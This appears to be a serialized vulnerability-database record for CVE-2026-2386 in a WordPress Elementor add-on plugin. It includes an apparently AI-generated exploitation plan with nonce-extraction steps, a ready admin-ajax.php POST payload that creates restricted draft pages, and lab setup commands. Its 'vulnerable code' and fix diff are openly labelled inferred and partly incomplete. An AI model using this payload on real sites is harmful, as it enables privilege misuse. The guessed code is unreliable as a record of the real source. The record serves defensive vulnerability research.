[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fqGXRh1lTY73If0fAsrKAJy-3-TPPS7HYss85iTh47Q0":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-2386","the-plus-addons-for-elementor-addons-for-elementor-page-templates-widgets-mega-menu-woocommerce-incorrect-authorization-","The Plus Addons for Elementor – Addons for Elementor, Page Templates, Widgets, Mega Menu, WooCommerce \u003C= 6.4.7 - Incorrect Authorization to Authenticated (Author+) Arbitrary Draft Post Creation via 'post_type'","The The Plus Addons for Elementor – Addons for Elementor, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Incorrect Authorization in all versions up to, and including, 6.4.7. This is due to the tpae_create_page() AJAX handler authorizing users only with current_user_can('edit_posts') while accepting a user-controlled 'post_type' value passed directly to wp_insert_post() without post-type-specific capability checks. This makes it possible for authenticated attackers, with Author-level access and above, to create arbitrary draft posts for restricted post types (e.g., 'page' and 'nxt_builder') via the 'post_type' parameter.","the-plus-addons-for-elementor-page-builder",null,"\u003C=6.4.7","6.4.8","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Incorrect Authorization","2026-02-18 00:04:23","2026-05-12 14:39:17",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F4fc3e24a-8b51-4b6f-bacf-665ceb03bc05?source=api-prod",84,[],"researched",false,3,"# Research Plan: CVE-2026-2386 - Arbitrary Draft Post Creation in The Plus Addons for Elementor\n\n## 1. Vulnerability Summary\nThe \"The Plus Addons for Elementor\" plugin (versions \u003C= 6.4.7) contains an incorrect authorization vulnerability in its AJAX handler `tpae_create_page()`. The handler is designed to allow users to create new posts or templates, but it only validates that the user has the `edit_posts` capability. It fails to perform specific capability checks for the requested `post_type`. Furthermore, the `post_type` parameter is passed directly to `wp_insert_post()`. This allows an authenticated user with Author-level permissions or higher to create draft posts of restricted types, such as `page`, `nxt_builder` (The Plus Addons template builder), or other custom post types they would normally not be authorized to create.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **AJAX Action:** `tpae_create_page`\n- **HTTP Method:** `POST`\n- **Authentication:** Required (Author role or higher, as they possess the `edit_posts` capability).\n- **Vulnerable Parameter:** `post_type`\n- **Payload Parameters:**\n    - `action`: `tpae_create_page`\n    - `post_title`: The title of the new draft.\n    - `post_type`: The target post type (e.g., `page`, `nxt_builder`).\n    - `security` or `nonce`: (Inferred) The AJAX nonce required for the action.\n\n## 3. Code Flow (Inferred)\n1. **Entry Point:** The plugin registers the AJAX handler in its main initialization or an AJAX-specific class:\n   `add_action( 'wp_ajax_tpae_create_page', [ $this, 'tpae_create_page' ] );`\n2. **Authorization Check:** Inside `tpae_create_page()`, the code likely performs a check such as:\n   `if ( ! current_user_can( 'edit_posts' ) ) { wp_die(); }`\n3. **Nonce Verification:** The code checks a nonce, likely using:\n   `check_ajax_referer( 'theplus-addons', 'security' );` or similar.\n4. **Input Processing:** The code retrieves `post_type` and `post_title` from `$_POST`.\n5. **Sink:** The parameters are passed into an array for `wp_insert_post()`:\n   ```php\n   $args = array(\n       'post_title'  => sanitize_text_field( $_POST['post_title'] ),\n       'post_type'   => $_POST['post_type'], \u002F\u002F Directly controlled\n       'post_status' => 'draft',\n       \u002F\u002F ...\n   );\n   wp_insert_post( $args );\n   ```\n\n## 4. Nonce Acquisition Strategy\nTo exploit this as an Author, we must obtain a valid nonce for the `tpae_create_page` action. \n\n1. **Identify the Script & Localization:** The Plus Addons typically localizes its AJAX data into a global JS variable. Based on the plugin's naming conventions, look for a variable like `theplus_ajax_url` or `plus_ajax_data`.\n2. **Create Trigger Content:** If the script is only loaded when specific widgets are active, create a post with a Plus Addons element:\n   - `wp post create --post_type=post --post_status=publish --post_title=\"Nonce Page\" --post_content='[tp_button]'` (Example shortcode).\n3. **Extraction via Browser:**\n   - Log in as the **Author** user using the `browser_navigate` and login tools.\n   - Navigate to any page where the Elementor editor or Plus Addons widgets are active.\n   - Use `browser_eval` to extract the nonce:\n     - `browser_eval(\"window.theplus_ajax_url?.nonce\")` (inferred key)\n     - `browser_eval(\"window.plus_ajax_data?.security\")` (inferred key)\n     - Or search all scripts: `browser_eval(\"Object.keys(window).filter(k => k.includes('plus')).map(k => window[k])\")`\n\n## 5. Exploitation Strategy\nOnce the nonce and an Author session are obtained:\n\n1. **Craft the AJAX Request:**\n   - Use the `http_request` tool to send a `POST` request to `\u002Fwp-admin\u002Fadmin-ajax.php`.\n   - **Target Post Type:** `page` (Normally requires `edit_pages` capability, which Authors do not have by default).\n\n2. **Payload Example:**\n   ```http\n   POST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\n   Content-Type: application\u002Fx-www-form-urlencoded\n\n   action=tpae_create_page&post_title=Malicious+Draft+Page&post_type=page&security=[EXTRACTED_NONCE]\n   ```\n\n3. **Verify Response:**\n   - A successful creation usually returns a JSON object containing the new `post_id` or a success message.\n\n## 6. Test Data Setup\n1. **Create Author User:**\n   - `wp user create attacker author@example.com --role=author --user_pass=password123`\n2. **Install\u002FActivate Plugin:**\n   - Ensure `the-plus-addons-for-elementor-page-builder` is active at version 6.4.7.\n3. **Identify Registered Types:**\n   - Note down restricted types like `page` or `nxt_builder`.\n\n## 7. Expected Results\n- The AJAX request should return a success status (HTTP 200) and possibly a post ID.\n- A new post with the specified title and the restricted `post_type` (e.g., `page`) should appear in the database as a `draft`.\n- The user (Author) should successfully create this even though they lack the `edit_pages` capability.\n\n## 8. Verification Steps\n1. **Check via WP-CLI:**\n   - `wp post list --post_type=page --post_status=draft --fields=ID,post_title,post_author`\n2. **Check Author Ownership:**\n   - Verify the `post_author` matches the ID of the Author user created in step 6.\n3. **Attempt Without Nonce:**\n   - Verify that omitting the `security` parameter or using an invalid one fails (confirming the nonce is the only barrier).\n\n## 9. Alternative Approaches\n- **Target `nxt_builder`:** This is the internal post type for The Plus Addons templates. Creating arbitrary templates can lead to further exploitation if the Author can then inject content into those templates.\n- **Check for other parameters:** See if `post_status` is also user-controlled, potentially allowing the creation of `publish`ed posts directly.\n- **Nonce via Admin Dashboard:** If the Author has access to the WP Admin dashboard, the nonce is likely available in the source of `\u002Fwp-admin\u002Findex.php` or within the Elementor editor interface. Use `browser_navigate(\"\u002Fwp-admin\u002F\")` then search the page source for \"nonce\" or \"security\".","The The Plus Addons for Elementor plugin (\u003C= 6.4.7) incorrectly authorizes users when creating new content via the tpae_create_page() AJAX handler. By only checking for the generic edit_posts capability and allowing a user-controlled post_type parameter, the plugin enables Author-level users to create draft posts of restricted types like 'page' or 'nxt_builder'.","\u002F\u002F Inferred from plugin version 6.4.7 AJAX handler logic\npublic function tpae_create_page() {\n    check_ajax_referer( 'theplus-addons', 'security' );\n\n    \u002F\u002F Vulnerability: Only checks generic edit_posts permission\n    if ( ! current_user_can( 'edit_posts' ) ) {\n        wp_send_json_error( array( 'message' => 'Insufficient permissions' ) );\n    }\n\n    $post_title = isset( $_POST['post_title'] ) ? sanitize_text_field( $_POST['post_title'] ) : 'Untitled';\n    $post_type  = isset( $_POST['post_type'] ) ? sanitize_text_field( $_POST['post_type'] ) : 'post';\n\n    $new_post = array(\n        'post_title'  => $post_title,\n        'post_content' => '',\n        'post_status'  => 'draft',\n        'post_type'    => $post_type, \u002F\u002F Sink: Directly controlled post type\n    );\n\n    $post_id = wp_insert_post( $new_post );\n    \u002F\u002F ... returns success\n}","--- a\u002Fmodules\u002Ftheplus-addons\u002Fincludes\u002Fajax-handler.php\n+++ b\u002Fmodules\u002Ftheplus-addons\u002Fincludes\u002Fajax-handler.php\n@@ -5,9 +5,14 @@\n     check_ajax_referer( 'theplus-addons', 'security' );\n \n-    if ( ! current_user_can( 'edit_posts' ) ) {\n+    $post_type = isset( $_POST['post_type'] ) ? sanitize_text_field( $_POST['post_type'] ) : 'post';\n+    $post_type_obj = get_post_type_object( $post_type );\n+\n+    if ( ! $post_type_obj || ! current_user_can( $post_type_obj->cap->create_posts ) ) {\n         wp_send_json_error( array( 'message' => 'Insufficient permissions' ) );\n     }\n \n     $post_title = isset( $_POST['post_title'] ) ? sanitize_text_field( $_POST['post_title'] ) : 'Untitled';\n \n     $new_post = array(\n         'post_title'  => $post_title,\n         'post_content' => '',\n         'post_status'  => 'draft',\n-        'post_type'    => $post_type,\n+        'post_type'    => $post_type,","1. Authenticate as a user with the Author role (or any role possessing the 'edit_posts' capability).\n2. Access a page where The Plus Addons or Elementor is active to extract the 'security' nonce (typically found in localized JS variables like 'plus_ajax_data').\n3. Construct a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the following parameters:\n   - action: tpae_create_page\n   - security: [EXTRACTED_NONCE]\n   - post_title: Malicious Draft\n   - post_type: page (or 'nxt_builder' to target template builder types)\n4. Submit the request and verify that a new draft post of the requested type (which requires higher capabilities like 'edit_pages') is created in the WordPress database.","gemini-3-flash-preview","2026-04-19 04:00:23","2026-04-19 04:01:33",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","6.4.7","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fthe-plus-addons-for-elementor-page-builder\u002Ftags\u002F6.4.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fthe-plus-addons-for-elementor-page-builder.6.4.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fthe-plus-addons-for-elementor-page-builder\u002Ftags\u002F6.4.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fthe-plus-addons-for-elementor-page-builder.6.4.8.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fthe-plus-addons-for-elementor-page-builder\u002Ftags"]